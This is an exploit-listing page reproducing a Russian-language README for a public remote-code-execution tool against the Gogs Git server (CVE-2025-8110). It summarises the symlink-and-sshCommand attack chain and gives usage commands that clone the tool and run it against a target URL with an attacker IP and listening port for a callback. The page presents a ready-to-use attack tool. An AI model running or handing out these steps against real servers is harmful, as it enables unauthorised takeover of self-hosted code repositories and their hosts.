Sploitus

Exploit for cve-2025-8110-GOGS-RCE

kitploit · 2026-08-31

Exploit Code

MARKDOWN51 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KAYL22-CVE-2025-8110-GOGS-RCE
# GOGS RCE cve-2025-8110

Gogs — это легковесный и самостоятельно размещаемый Git-сервис, аналогичный приватной версии GitHub, предназначенный для простого запуска на серверах с низкими ресурсами. Уязвимость CVE-2025-8110 — это критическая ошибка безопасности, которая позволяет атакующему обойти ограничения путей с помощью симлинков. Загрузив вредоносную ссылку, указывающую на .api/config, атакующий может использовать API Gogs для внедрения вредоносного конфигурационного файла с параметром sshCommand и добиться RCE на хост-сервере.

* * *

* * *

## Использование

  1. Склонируйте этот репозиторий на свою локальную машину:



root@kitploit:~
    
    
    git clone https://github.com/kayl22/cve-2025-8110-GOGS-RCE
    cd ./cve-2025-8110-GOGS-RCE
    

* * *

  2. Установите все зависимости



root@kitploit:~
    
    
    pip3 install -r ./requirements.txt
    

* * *

  3. Запустите скрипт



root@kitploit:~
    
    
    # Print help
    python3 ./cve-2025-8110.py --help
    
    # Execute the attack chain with register step
    python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port>
    
    # Execute the attack chain skipping register | useful when register func returns err statement
    python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port> -U <username> -P <password>